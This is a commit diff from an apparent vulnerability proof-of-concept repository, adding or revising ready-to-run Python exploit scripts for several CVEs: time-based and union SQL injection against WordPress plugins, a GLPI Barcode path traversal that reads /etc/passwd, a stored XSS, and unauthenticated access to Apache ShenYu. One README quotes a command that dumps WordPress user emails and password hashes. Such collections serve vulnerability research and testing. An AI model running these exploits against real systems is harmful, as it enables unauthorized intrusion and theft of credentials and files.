fix

2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py

@@ -1,5 +1,5 @@
 import requests
-
+import time
 
 # Vuln Base Info
 def info():
@@ -29,7 +29,20 @@ def info():
 
 # Vender Fingerprint
 def fingerprint(url):
-    return True
+    username = "admin"
+    password = "admin"
+    s = requests.Session()
+    path = """/wp-login.php"""
+    method = "POST"
+    data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
+    headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
+    resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+
+    resp1 = s.get(url+"/wp-admin/admin.php?page=zm_gallery")
+    if "ZM Gallery Plugin" in resp1.text:
+        return True
+    else:
+        return False
 
 # Proof of Concept
 def poc(url):
@@ -47,19 +60,15 @@ def poc(url):
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
-        path = """/wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc"""
+        path = """/wp-admin/admin.php?page=zm_gallery&orderby=1%20AND%20(SELECT%204291%20FROM%20(SELECT(SLEEP(3)))cxXu)&order=desc"""
         method = "GET"
         data = """"""
         headers = {}
+        time1 = time.time()
         resp1 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        time2 = time.time()
 
-        path = """/wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc"""
-        method = "GET"
-        data = """"""
-        headers = {}
-        resp2 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
-
-        if "<th scope=\"row\" class=\"check-column\">" in resp1.text and "<th scope=\"row\" class=\"check-column\">" not in resp2.text:
+        if "ZM Gallery Plugin" in resp1.text and 3 <= (time2-time1) < 10:
             result["success"] = True
             result["info"] = info()
             result["payload"] = url+path

2016/CVE-2016-10940/vultarget/README.md

@@ -15,6 +15,6 @@ Username/Password: wordpress/wordpress
 
 ## Poc
 
-[poc](poc/nuclei/CVE-2016-10940.yaml)
+[poc](../poc/pocsploit/CVE-2016-10940.py)
 
 ![](1.png)

2021/CVE-2021-24750/poc/pocsploit/CVE-2021-24750.py

@@ -19,8 +19,7 @@ def info():
             "cwe-id": "CWE-89"
         },
         "metadata":{
-            "vuln-target": "",
-
+            "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24750/vultarget"
         },
         "tags": ["cve", "cve2021", "sqli", "wp", "wordpress", "wp-plugin", "authenticated"],
     }
@@ -33,22 +32,23 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
         s = requests.Session()
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
-        resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False)
 
-        path = """/wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D"""
-        method = "CVE-2021-24750'),4--%20%22%7D"
-        data = """"""
+        path = "/wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D"
+        method = "GET"
         headers = {}
-        resp1 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp1 = s.request(method=method,url=url+path,headers=headers,timeout=10,verify=False)
 
         if ("""266f89556d2b38ff067b580fb305c522""" in resp1.text) and (resp1.status_code == 200):
             result["success"] = True

2021/CVE-2021-24750/vultarget/README.md

@@ -10,4 +10,10 @@ docker-compose run --rm wp-cli install-wp
 * Start the exploit script with an sql query that gets users emails and passwords
 ```
 python3 exploit.py -C 'union select 1,1,user_email,user_pass from wp_users -- '
-```
+```
+
+## Poc
+
+![](1.png)
+
+[Poc](../poc/pocsploit/CVE-2021-24750.py)

2021/CVE-2021-43778/poc/pocsploit/CVE-2021-43778.py

@@ -0,0 +1,70 @@
+import requests
+
+
+# Vuln Base Info
+def info():
+    return {
+        "author": "cckuailong",
+        "name": '''GLPI plugin Barcode < 2.6.1 path traversal vulnerability''',
+        "description": '''Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file.''',
+        "severity": "critical",
+        "references": [
+            "https://github.com/AK-blank/CVE-2021-43778", 
+            "https://nvd.nist.gov/vuln/detail/CVE-2021-43778"
+        ],
+        "classification": {
+            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
+            "cvss-score": "9.1",
+            "cve-id": "CVE-2021-43778",
+            "cwe-id": "CWE-22"
+        },
+        "metadata":{
+            "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-43778/vultarget"
+        },
+        "tags": ["glpi", "cve", "cve2021", "lfi"],
+    }
+
+
+# Vender Fingerprint
+def fingerprint(url):
+    resp = requests.get(url+"/glpi/", timeout=10, verify=False, allow_redirects=False)
+    if "GLPI - " in resp.text and "/pics/login_logo_glpi.png" in resp.text:
+        return True
+    else:
+        return False
+
+# Proof of Concept
+def poc(url):
+    result = {}
+    try:
+        url = format_url(url)
+
+        path = "/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"
+        method = "GET"
+        headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36"}
+        resp = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
+
+        if "root:" in resp.text and ":0:0" in resp.text and resp.status_code == 200:
+            result["success"] = True
+            result["info"] = info()
+            result["payload"] = url+path
+
+    except:
+        result["success"] = False
+
+    return result
+
+
+# Exploit, can be same with poc()
+def exp(url):
+    return poc(url)
+
+
+# Utils
+def format_url(url):
+    url = url.strip()
+    if not ( url.startswith('http://') or url.startswith('https://') ):
+        url = 'http://' + url
+    url = url.rstrip('/')
+
+    return url

2021/CVE-2021-43778/vultarget/README.md

@@ -0,0 +1,7 @@
+## Install the glpi
+
+## Copy the vuln plugin to DIR plugins/
+
+## Poc
+
+[Poc](../poc/pocsploit/CVE-2021-43778.py)

2021/CVE-2021-46005/poc/pocsploit/CVE-2021-46005.py

@@ -19,31 +19,35 @@ def info():
             "cwe-id": "CWE-79"
         },
         "metadata":{
-            "vuln-target": "",
-
+            "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-46005/vultarget"
         },
         "tags": ["cve", "cve2021", "xss", "sourcecodester", "authenticated"],
     }
 
 
 # Vender Fingerprint
 def fingerprint(url):
-    return True
+    resp = requests.get(url, timeout=10, verify=False)
+    if "<title>Car Rental Portal</title>" in resp.text:
+        return True
+    else:
+        return False
 
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
         s = requests.Session()
 
         path = """/admin/"""
         method = "POST"
-        data = """username={{username}}&password={{password}}&login="""
+        data = """username={username}&password={password}&login=""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Connection': 'close'}
-        resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
-
+        resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False)
         path = """/admin/post-avehical.php"""
         method = "POST"
         data = """------WebKitFormBoundarypWqYipqU21aYgccv

2021/CVE-2021-46005/vultarget/README.md

@@ -123,3 +123,9 @@ Content-Disposition: form-data; name="submit"
 4. Open the http://localhost/car-rental/ and our Payload excuted.
 
 ![](images/4.png)
+
+## Poc
+
+[Poc](../poc/pocsploit/CVE-2021-46005.py)
+
+![](1.png)

2022/CVE-2022-23944/poc/pocsploit/CVE-2022-23944.py

@@ -0,0 +1,70 @@
+import requests
+
+
+# Vuln Base Info
+def info():
+    return {
+        "author": "cckuailong",
+        "name": '''ShenYu Admin Unauth Access''',
+        "description": '''User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.''',
+        "severity": "medium",
+        "references": [
+            "https://github.com/apache/incubator-shenyu/pull/2462/files", 
+            "https://nvd.nist.gov/vuln/detail/CVE-2022-23944"
+        ],
+        "classification": {
+            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
+            "cvss-score": "9.1",
+            "cve-id": "CVE-2022-23944",
+            "cwe-id": "CWE-306, CWE-862"
+        },
+        "metadata":{
+            "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-23944/vultarget"
+        },
+        "tags": ["shenyu", "unauth" , "apache"],
+    }
+
+
+# Vender Fingerprint
+def fingerprint(url):
+    resp = requests.get(url, timeout=10, verify=False)
+    if "<title>ShenYu Gateway</title>" in resp.text:
+        return True
+    else:
+        return False
+
+# Proof of Concept
+def poc(url):
+    result = {}
+    try:
+        url = format_url(url)
+
+        path = "/plugin"
+        method = "GET"
+        headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36"}
+        resp = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
+
+        if resp.status_code == 200 and '"message":"query success"' in resp.text and '"code":200' in resp.text:
+            result["success"] = True
+            result["info"] = info()
+            result["payload"] = url+path
+
+    except:
+        result["success"] = False
+
+    return result
+
+
+# Exploit, can be same with poc()
+def exp(url):
+    return poc(url)
+
+
+# Utils
+def format_url(url):
+    url = url.strip()
+    if not ( url.startswith('http://') or url.startswith('https://') ):
+        url = 'http://' + url
+    url = url.rstrip('/')
+
+    return url

2022/CVE-2022-23944/vultarget/README.md

@@ -17,3 +17,7 @@ vuln app:
 version >= 4.2, return 600
 
 ![](2.png)
+
+[Poc](../poc/pocsploit/CVE-2022-23944.py)
+
+![](3.png)